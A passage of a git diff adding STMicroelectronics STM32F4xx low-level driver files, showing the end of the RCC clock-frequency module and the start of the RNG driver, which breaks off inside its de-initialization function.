/* CEC */ + +#if defined(USB_OTG_FS) || defined(USB_OTG_HS) +/** + * @brief Return USBx clock frequency + * @param USBxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_USB_CLKSOURCE + * @retval USB clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetUSBClockFreq(uint32_t USBxSource) +{ + uint32_t usb_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_USB_CLKSOURCE(USBxSource)); + +#if defined(RCC_DCKCFGR_CK48MSEL) || defined(RCC_DCKCFGR2_CK48MSEL) + /* USBCLK clock frequency */ + switch (LL_RCC_GetUSBClockSource(USBxSource)) + { +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) && !defined(RCC_DCKCFGR_PLLI2SDIVQ) + case LL_RCC_USB_CLKSOURCE_PLLI2S: /* PLLI2S clock used as USB clock source */ + if (LL_RCC_PLLI2S_IsReady()) + { + usb_frequency = RCC_PLLI2S_GetFreqDomain_48M(); + } + break; + +#endif /* RCC_PLLI2SCFGR_PLLI2SQ && !RCC_DCKCFGR_PLLI2SDIVQ */ + +#if defined(RCC_PLLSAI_SUPPORT) + case LL_RCC_USB_CLKSOURCE_PLLSAI: /* PLLSAI clock used as USB clock source */ + if (LL_RCC_PLLSAI_IsReady()) + { + usb_frequency = RCC_PLLSAI_GetFreqDomain_48M(); + } + break; +#endif /* RCC_PLLSAI_SUPPORT */ + + case LL_RCC_USB_CLKSOURCE_PLL: /* PLL clock used as USB clock source */ + default: + if (LL_RCC_PLL_IsReady()) + { + usb_frequency = RCC_PLL_GetFreqDomain_48M(); + } + break; + } +#else + /* PLL clock used as USB clock source */ + if (LL_RCC_PLL_IsReady()) + { + usb_frequency = RCC_PLL_GetFreqDomain_48M(); + } +#endif /* RCC_DCKCFGR_CK48MSEL || RCC_DCKCFGR2_CK48MSEL */ + + return usb_frequency; +} +#endif /* USB_OTG_FS || USB_OTG_HS */ + +#if defined(DFSDM1_Channel0) +/** + * @brief Return DFSDMx clock frequency + * @param DFSDMxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_DFSDM1_CLKSOURCE + * @arg @ref LL_RCC_DFSDM2_CLKSOURCE (*) + * + * (*) value not defined in all devices. + * @retval DFSDM clock frequency (in Hz) + */ +uint32_t LL_RCC_GetDFSDMClockFreq(uint32_t DFSDMxSource) +{ + uint32_t dfsdm_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_DFSDM_CLKSOURCE(DFSDMxSource)); + + if (DFSDMxSource == LL_RCC_DFSDM1_CLKSOURCE) + { + /* DFSDM1CLK clock frequency */ + switch (LL_RCC_GetDFSDMClockSource(DFSDMxSource)) + { + case LL_RCC_DFSDM1_CLKSOURCE_SYSCLK: /* DFSDM1 Clock is SYSCLK */ + dfsdm_frequency = RCC_GetSystemClockFreq(); + break; + + case LL_RCC_DFSDM1_CLKSOURCE_PCLK2: /* DFSDM1 Clock is PCLK2 */ + default: + dfsdm_frequency = RCC_GetPCLK2ClockFreq(RCC_GetHCLKClockFreq(RCC_GetSystemClockFreq())); + break; + } + } +#if defined(DFSDM2_Channel0) + else + { + /* DFSDM2CLK clock frequency */ + switch (LL_RCC_GetDFSDMClockSource(DFSDMxSource)) + { + case LL_RCC_DFSDM2_CLKSOURCE_SYSCLK: /* DFSDM2 Clock is SYSCLK */ + dfsdm_frequency = RCC_GetSystemClockFreq(); + break; + + case LL_RCC_DFSDM2_CLKSOURCE_PCLK2: /* DFSDM2 Clock is PCLK2 */ + default: + dfsdm_frequency = RCC_GetPCLK2ClockFreq(RCC_GetHCLKClockFreq(RCC_GetSystemClockFreq())); + break; + } + } +#endif /* DFSDM2_Channel0 */ + + return dfsdm_frequency; +} + +/** + * @brief Return DFSDMx Audio clock frequency + * @param DFSDMxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_DFSDM1_AUDIO_CLKSOURCE + * @arg @ref LL_RCC_DFSDM2_AUDIO_CLKSOURCE (*) + * + * (*) value not defined in all devices. + * @retval DFSDM clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetDFSDMAudioClockFreq(uint32_t DFSDMxSource) +{ + uint32_t dfsdm_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_DFSDM_AUDIO_CLKSOURCE(DFSDMxSource)); + + if (DFSDMxSource == LL_RCC_DFSDM1_AUDIO_CLKSOURCE) + { + /* DFSDM1CLK clock frequency */ + switch (LL_RCC_GetDFSDMAudioClockSource(DFSDMxSource)) + { + case LL_RCC_DFSDM1_AUDIO_CLKSOURCE_I2S1: /* I2S1 clock used as DFSDM1 clock */ + dfsdm_frequency = LL_RCC_GetI2SClockFreq(LL_RCC_I2S1_CLKSOURCE); + break; + + case LL_RCC_DFSDM1_AUDIO_CLKSOURCE_I2S2: /* I2S2 clock used as DFSDM1 clock */ + default: + dfsdm_frequency = LL_RCC_GetI2SClockFreq(LL_RCC_I2S2_CLKSOURCE); + break; + } + } +#if defined(DFSDM2_Channel0) + else + { + /* DFSDM2CLK clock frequency */ + switch (LL_RCC_GetDFSDMAudioClockSource(DFSDMxSource)) + { + case LL_RCC_DFSDM2_AUDIO_CLKSOURCE_I2S1: /* I2S1 clock used as DFSDM2 clock */ + dfsdm_frequency = LL_RCC_GetI2SClockFreq(LL_RCC_I2S1_CLKSOURCE); + break; + + case LL_RCC_DFSDM2_AUDIO_CLKSOURCE_I2S2: /* I2S2 clock used as DFSDM2 clock */ + default: + dfsdm_frequency = LL_RCC_GetI2SClockFreq(LL_RCC_I2S2_CLKSOURCE); + break; + } + } +#endif /* DFSDM2_Channel0 */ + + return dfsdm_frequency; +} +#endif /* DFSDM1_Channel0 */ + +#if defined(DSI) +/** + * @brief Return DSI clock frequency + * @param DSIxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_DSI_CLKSOURCE + * @retval DSI clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + * - @ref LL_RCC_PERIPH_FREQUENCY_NA indicates that external clock is used + */ +uint32_t LL_RCC_GetDSIClockFreq(uint32_t DSIxSource) +{ + uint32_t dsi_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_DSI_CLKSOURCE(DSIxSource)); + + /* DSICLK clock frequency */ + switch (LL_RCC_GetDSIClockSource(DSIxSource)) + { + case LL_RCC_DSI_CLKSOURCE_PLL: /* DSI Clock is PLL Osc. */ + if (LL_RCC_PLL_IsReady()) + { + dsi_frequency = RCC_PLL_GetFreqDomain_DSI(); + } + break; + + case LL_RCC_DSI_CLKSOURCE_PHY: /* DSI Clock is DSI physical clock. */ + default: + dsi_frequency = LL_RCC_PERIPH_FREQUENCY_NA; + break; + } + + return dsi_frequency; +} +#endif /* DSI */ + +#if defined(LTDC) +/** + * @brief Return LTDC clock frequency + * @param LTDCxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_LTDC_CLKSOURCE + * @retval LTDC clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator PLLSAI is not ready + */ +uint32_t LL_RCC_GetLTDCClockFreq(uint32_t LTDCxSource) +{ + uint32_t ltdc_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_LTDC_CLKSOURCE(LTDCxSource)); + + if (LL_RCC_PLLSAI_IsReady()) + { + ltdc_frequency = RCC_PLLSAI_GetFreqDomain_LTDC(); + } + + return ltdc_frequency; +} +#endif /* LTDC */ + +#if defined(SPDIFRX) +/** + * @brief Return SPDIFRX clock frequency + * @param SPDIFRXxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_SPDIFRX1_CLKSOURCE + * @retval SPDIFRX clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetSPDIFRXClockFreq(uint32_t SPDIFRXxSource) +{ + uint32_t spdifrx_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_SPDIFRX_CLKSOURCE(SPDIFRXxSource)); + + /* SPDIFRX1CLK clock frequency */ + switch (LL_RCC_GetSPDIFRXClockSource(SPDIFRXxSource)) + { + case LL_RCC_SPDIFRX1_CLKSOURCE_PLLI2S: /* SPDIFRX Clock is PLLI2S Osc. */ + if (LL_RCC_PLLI2S_IsReady()) + { + spdifrx_frequency = RCC_PLLI2S_GetFreqDomain_SPDIFRX(); + } + break; + + case LL_RCC_SPDIFRX1_CLKSOURCE_PLL: /* SPDIFRX Clock is PLL Osc. */ + default: + if (LL_RCC_PLL_IsReady()) + { + spdifrx_frequency = RCC_PLL_GetFreqDomain_SPDIFRX(); + } + break; + } + + return spdifrx_frequency; +} +#endif /* SPDIFRX */ + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup RCC_LL_Private_Functions + * @{ + */ + +/** + * @brief Return SYSTEM clock frequency + * @retval SYSTEM clock frequency (in Hz) + */ +uint32_t RCC_GetSystemClockFreq(void) +{ + uint32_t frequency = 0U; + + /* Get SYSCLK source -------------------------------------------------------*/ + switch (LL_RCC_GetSysClkSource()) + { + case LL_RCC_SYS_CLKSOURCE_STATUS_HSI: /* HSI used as system clock source */ + frequency = HSI_VALUE; + break; + + case LL_RCC_SYS_CLKSOURCE_STATUS_HSE: /* HSE used as system clock source */ + frequency = HSE_VALUE; + break; + + case LL_RCC_SYS_CLKSOURCE_STATUS_PLL: /* PLL used as system clock source */ + frequency = RCC_PLL_GetFreqDomain_SYS(LL_RCC_SYS_CLKSOURCE_STATUS_PLL); + break; + +#if defined(RCC_PLLR_SYSCLK_SUPPORT) + case LL_RCC_SYS_CLKSOURCE_STATUS_PLLR: /* PLLR used as system clock source */ + frequency = RCC_PLL_GetFreqDomain_SYS(LL_RCC_SYS_CLKSOURCE_STATUS_PLLR); + break; +#endif /* RCC_PLLR_SYSCLK_SUPPORT */ + + default: + frequency = HSI_VALUE; + break; + } + + return frequency; +} + +/** + * @brief Return HCLK clock frequency + * @param SYSCLK_Frequency SYSCLK clock frequency + * @retval HCLK clock frequency (in Hz) + */ +uint32_t RCC_GetHCLKClockFreq(uint32_t SYSCLK_Frequency) +{ + /* HCLK clock frequency */ + return __LL_RCC_CALC_HCLK_FREQ(SYSCLK_Frequency, LL_RCC_GetAHBPrescaler()); +} + +/** + * @brief Return PCLK1 clock frequency + * @param HCLK_Frequency HCLK clock frequency + * @retval PCLK1 clock frequency (in Hz) + */ +uint32_t RCC_GetPCLK1ClockFreq(uint32_t HCLK_Frequency) +{ + /* PCLK1 clock frequency */ + return __LL_RCC_CALC_PCLK1_FREQ(HCLK_Frequency, LL_RCC_GetAPB1Prescaler()); +} + +/** + * @brief Return PCLK2 clock frequency + * @param HCLK_Frequency HCLK clock frequency + * @retval PCLK2 clock frequency (in Hz) + */ +uint32_t RCC_GetPCLK2ClockFreq(uint32_t HCLK_Frequency) +{ + /* PCLK2 clock frequency */ + return __LL_RCC_CALC_PCLK2_FREQ(HCLK_Frequency, LL_RCC_GetAPB2Prescaler()); +} + +/** + * @brief Return PLL clock frequency used for system domain + * @param SYSCLK_Source System clock source + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_SYS(uint32_t SYSCLK_Source) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U, plloutputfreq = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SYSCLK = PLL_VCO / (PLLP or PLLR) + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + pllinputfreq = HSI_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + default: + pllinputfreq = HSI_VALUE; + break; + } + + if (SYSCLK_Source == LL_RCC_SYS_CLKSOURCE_STATUS_PLL) + { + plloutputfreq = __LL_RCC_CALC_PLLCLK_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetP()); + } +#if defined(RCC_PLLR_SYSCLK_SUPPORT) + else + { + plloutputfreq = __LL_RCC_CALC_PLLRCLK_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR()); + } +#endif /* RCC_PLLR_SYSCLK_SUPPORT */ + + return plloutputfreq; +} + +/** + * @brief Return PLL clock frequency used for 48 MHz domain + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_48M(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM ) * PLLN + 48M Domain clock = PLL_VCO / PLLQ + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + pllinputfreq = HSI_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLCLK_48M_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetQ()); +} + +#if defined(DSI) +/** + * @brief Return PLL clock frequency used for DSI clock + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_DSI(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + DSICLK = PLL_VCO / PLLR + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLCLK_DSI_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR()); +} +#endif /* DSI */ + +#if defined(RCC_DCKCFGR_I2SSRC) || defined(RCC_DCKCFGR_I2S1SRC) +/** + * @brief Return PLL clock frequency used for I2S clock + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_I2S(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + I2SCLK = PLL_VCO / PLLR + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLCLK_I2S_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR()); +} +#endif /* RCC_DCKCFGR_I2SSRC || RCC_DCKCFGR_I2S1SRC */ + +#if defined(SPDIFRX) +/** + * @brief Return PLL clock frequency used for SPDIFRX clock + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_SPDIFRX(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SPDIFRXCLK = PLL_VCO / PLLR + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLCLK_SPDIFRX_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR()); +} +#endif /* SPDIFRX */ + +#if defined(RCC_PLLCFGR_PLLR) +#if defined(SAI1) +/** + * @brief Return PLL clock frequency used for SAI clock + * @retval PLL clock frequency (in Hz) + */ +uint32_t RCC_PLL_GetFreqDomain_SAI(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U, plloutputfreq = 0U; + + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SAICLK = (PLL_VCO / PLLR) / PLLDIVR + or + SAICLK = PLL_VCO / PLLR + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLL clock source */ + pllinputfreq = HSE_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLL clock source */ + default: + pllinputfreq = HSI_VALUE; + break; + } + +#if defined(RCC_DCKCFGR_PLLDIVR) + plloutputfreq = __LL_RCC_CALC_PLLCLK_SAI_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR(), LL_RCC_PLL_GetDIVR()); +#else + plloutputfreq = __LL_RCC_CALC_PLLCLK_SAI_FREQ(pllinputfreq, LL_RCC_PLL_GetDivider(), + LL_RCC_PLL_GetN(), LL_RCC_PLL_GetR()); +#endif /* RCC_DCKCFGR_PLLDIVR */ + + return plloutputfreq; +} +#endif /* SAI1 */ +#endif /* RCC_PLLCFGR_PLLR */ + +#if defined(RCC_PLLSAI_SUPPORT) +/** + * @brief Return PLLSAI clock frequency used for SAI domain + * @retval PLLSAI clock frequency (in Hz) + */ +uint32_t RCC_PLLSAI_GetFreqDomain_SAI(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLLSAI_VCO = (HSE_VALUE or HSI_VALUE / PLLSAIM) * PLLSAIN + SAI domain clock = (PLLSAI_VCO / PLLSAIQ) / PLLSAIDIVQ + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLSAI clock source */ + pllinputfreq = HSI_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLSAI clock source */ + pllinputfreq = HSE_VALUE; + break; + + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLSAI_SAI_FREQ(pllinputfreq, LL_RCC_PLLSAI_GetDivider(), + LL_RCC_PLLSAI_GetN(), LL_RCC_PLLSAI_GetQ(), LL_RCC_PLLSAI_GetDIVQ()); +} + +#if defined(RCC_PLLSAICFGR_PLLSAIP) +/** + * @brief Return PLLSAI clock frequency used for 48Mhz domain + * @retval PLLSAI clock frequency (in Hz) + */ +uint32_t RCC_PLLSAI_GetFreqDomain_48M(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLLSAI_VCO = (HSE_VALUE or HSI_VALUE / PLLSAIM) * PLLSAIN + 48M Domain clock = PLLSAI_VCO / PLLSAIP + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLSAI clock source */ + pllinputfreq = HSI_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLSAI clock source */ + pllinputfreq = HSE_VALUE; + break; + + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLSAI_48M_FREQ(pllinputfreq, LL_RCC_PLLSAI_GetDivider(), + LL_RCC_PLLSAI_GetN(), LL_RCC_PLLSAI_GetP()); +} +#endif /* RCC_PLLSAICFGR_PLLSAIP */ + +#if defined(LTDC) +/** + * @brief Return PLLSAI clock frequency used for LTDC domain + * @retval PLLSAI clock frequency (in Hz) + */ +uint32_t RCC_PLLSAI_GetFreqDomain_LTDC(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLLSAI_VCO = (HSE_VALUE or HSI_VALUE / PLLSAIM) * PLLSAIN + LTDC Domain clock = (PLLSAI_VCO / PLLSAIR) / PLLSAIDIVR + */ + pllsource = LL_RCC_PLL_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLSAI clock source */ + pllinputfreq = HSI_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLSAI clock source */ + pllinputfreq = HSE_VALUE; + break; + + default: + pllinputfreq = HSI_VALUE; + break; + } + return __LL_RCC_CALC_PLLSAI_LTDC_FREQ(pllinputfreq, LL_RCC_PLLSAI_GetDivider(), + LL_RCC_PLLSAI_GetN(), LL_RCC_PLLSAI_GetR(), LL_RCC_PLLSAI_GetDIVR()); +} +#endif /* LTDC */ +#endif /* RCC_PLLSAI_SUPPORT */ + +#if defined(RCC_PLLI2S_SUPPORT) +#if defined(SAI1) +/** + * @brief Return PLLI2S clock frequency used for SAI domains + * @retval PLLI2S clock frequency (in Hz) + */ +uint32_t RCC_PLLI2S_GetFreqDomain_SAI(void) +{ + uint32_t plli2sinputfreq = 0U, plli2ssource = 0U, plli2soutputfreq = 0U; + + /* PLLI2S_VCO = (HSE_VALUE or HSI_VALUE / PLLI2SM) * PLLI2SN + SAI domain clock = (PLLI2S_VCO / PLLI2SQ) / PLLI2SDIVQ + or + SAI domain clock = (PLLI2S_VCO / PLLI2SR) / PLLI2SDIVR + */ + plli2ssource = LL_RCC_PLLI2S_GetMainSource(); + + switch (plli2ssource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLI2S clock source */ + plli2sinputfreq = HSE_VALUE; + break; + +#if defined(RCC_PLLI2SCFGR_PLLI2SSRC) + case LL_RCC_PLLI2SSOURCE_PIN: /* External pin input clock used as PLLI2S clock source */ + plli2sinputfreq = EXTERNAL_CLOCK_VALUE; + break; +#endif /* RCC_PLLI2SCFGR_PLLI2SSRC */ + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLI2S clock source */ + default: + plli2sinputfreq = HSI_VALUE; + break; + } + +#if defined(RCC_DCKCFGR_PLLI2SDIVQ) + plli2soutputfreq = __LL_RCC_CALC_PLLI2S_SAI_FREQ(plli2sinputfreq, LL_RCC_PLLI2S_GetDivider(), + LL_RCC_PLLI2S_GetN(), LL_RCC_PLLI2S_GetQ(), LL_RCC_PLLI2S_GetDIVQ()); +#else + plli2soutputfreq = __LL_RCC_CALC_PLLI2S_SAI_FREQ(plli2sinputfreq, LL_RCC_PLLI2S_GetDivider(), + LL_RCC_PLLI2S_GetN(), LL_RCC_PLLI2S_GetR(), LL_RCC_PLLI2S_GetDIVR()); +#endif /* RCC_DCKCFGR_PLLI2SDIVQ */ + + return plli2soutputfreq; +} +#endif /* SAI1 */ + +#if defined(SPDIFRX) +/** + * @brief Return PLLI2S clock frequency used for SPDIFRX domain + * @retval PLLI2S clock frequency (in Hz) + */ +uint32_t RCC_PLLI2S_GetFreqDomain_SPDIFRX(void) +{ + uint32_t pllinputfreq = 0U, pllsource = 0U; + + /* PLLI2S_VCO = (HSE_VALUE or HSI_VALUE / PLLI2SM) * PLLI2SN + SPDIFRX Domain clock = PLLI2S_VCO / PLLI2SP + */ + pllsource = LL_RCC_PLLI2S_GetMainSource(); + + switch (pllsource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLI2S clock source */ + pllinputfreq = HSE_VALUE; + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLI2S clock source */ + default: + pllinputfreq = HSI_VALUE; + break; + } + + return __LL_RCC_CALC_PLLI2S_SPDIFRX_FREQ(pllinputfreq, LL_RCC_PLLI2S_GetDivider(), + LL_RCC_PLLI2S_GetN(), LL_RCC_PLLI2S_GetP()); +} +#endif /* SPDIFRX */ + +/** + * @brief Return PLLI2S clock frequency used for I2S domain + * @retval PLLI2S clock frequency (in Hz) + */ +uint32_t RCC_PLLI2S_GetFreqDomain_I2S(void) +{ + uint32_t plli2sinputfreq = 0U, plli2ssource = 0U, plli2soutputfreq = 0U; + + /* PLLI2S_VCO = (HSE_VALUE or HSI_VALUE / PLLI2SM) * PLLI2SN + I2S Domain clock = PLLI2S_VCO / PLLI2SR + */ + plli2ssource = LL_RCC_PLLI2S_GetMainSource(); + + switch (plli2ssource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLI2S clock source */ + plli2sinputfreq = HSE_VALUE; + break; + +#if defined(RCC_PLLI2SCFGR_PLLI2SSRC) + case LL_RCC_PLLI2SSOURCE_PIN: /* External pin input clock used as PLLI2S clock source */ + plli2sinputfreq = EXTERNAL_CLOCK_VALUE; + break; +#endif /* RCC_PLLI2SCFGR_PLLI2SSRC */ + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLI2S clock source */ + default: + plli2sinputfreq = HSI_VALUE; + break; + } + + plli2soutputfreq = __LL_RCC_CALC_PLLI2S_I2S_FREQ(plli2sinputfreq, LL_RCC_PLLI2S_GetDivider(), + LL_RCC_PLLI2S_GetN(), LL_RCC_PLLI2S_GetR()); + + return plli2soutputfreq; +} + +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) && !defined(RCC_DCKCFGR_PLLI2SDIVQ) +/** + * @brief Return PLLI2S clock frequency used for 48Mhz domain + * @retval PLLI2S clock frequency (in Hz) + */ +uint32_t RCC_PLLI2S_GetFreqDomain_48M(void) +{ + uint32_t plli2sinputfreq = 0U, plli2ssource = 0U, plli2soutputfreq = 0U; + + /* PLL48M_VCO = (HSE_VALUE or HSI_VALUE / PLLI2SM) * PLLI2SN + 48M Domain clock = PLLI2S_VCO / PLLI2SQ + */ + plli2ssource = LL_RCC_PLLI2S_GetMainSource(); + + switch (plli2ssource) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE used as PLLI2S clock source */ + plli2sinputfreq = HSE_VALUE; + break; + +#if defined(RCC_PLLI2SCFGR_PLLI2SSRC) + case LL_RCC_PLLI2SSOURCE_PIN: /* External pin input clock used as PLLI2S clock source */ + plli2sinputfreq = EXTERNAL_CLOCK_VALUE; + break; +#endif /* RCC_PLLI2SCFGR_PLLI2SSRC */ + + case LL_RCC_PLLSOURCE_HSI: /* HSI used as PLLI2S clock source */ + default: + plli2sinputfreq = HSI_VALUE; + break; + } + + plli2soutputfreq = __LL_RCC_CALC_PLLI2S_48M_FREQ(plli2sinputfreq, LL_RCC_PLLI2S_GetDivider(), + LL_RCC_PLLI2S_GetN(), LL_RCC_PLLI2S_GetQ()); + + return plli2soutputfreq; +} +#endif /* RCC_PLLI2SCFGR_PLLI2SQ && !RCC_DCKCFGR_PLLI2SDIVQ */ +#endif /* RCC_PLLI2S_SUPPORT */ +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined(RCC) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rng.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rng.c new file mode 100644 index 000000000..1b202c960 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rng.c @@ -0,0 +1,104 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_rng.c + * @author MCD Application Team + * @brief RNG LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_rng.h" +#include "stm32f4xx_ll_bus.h" + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (RNG) + +/** @addtogroup RNG_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup RNG_LL_Exported_Functions + * @{ + */ + +/** @addtogroup RNG_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize RNG registers (Registers restored to their default values). + * @param RNGx RNG Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RNG registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_RNG_DeInit(RNG_TypeDef *RNGx) +{ + /* Check the parameters */ + assert_param(IS_RNG_ALL_INSTANCE(RNGx)); +#if !defined(RCC_AHB2_SUPPORT) + /* Enable RNG reset state */ + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_RNG); + + /* Release RNG from reset state */ + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_RNG); +#else + /* Enable RNG reset state */ + LL_AHB2_GRP1_ForceReset(LL_AHB2_GRP1_PERIPH_RNG); + + /* Release RNG from reset state */ + 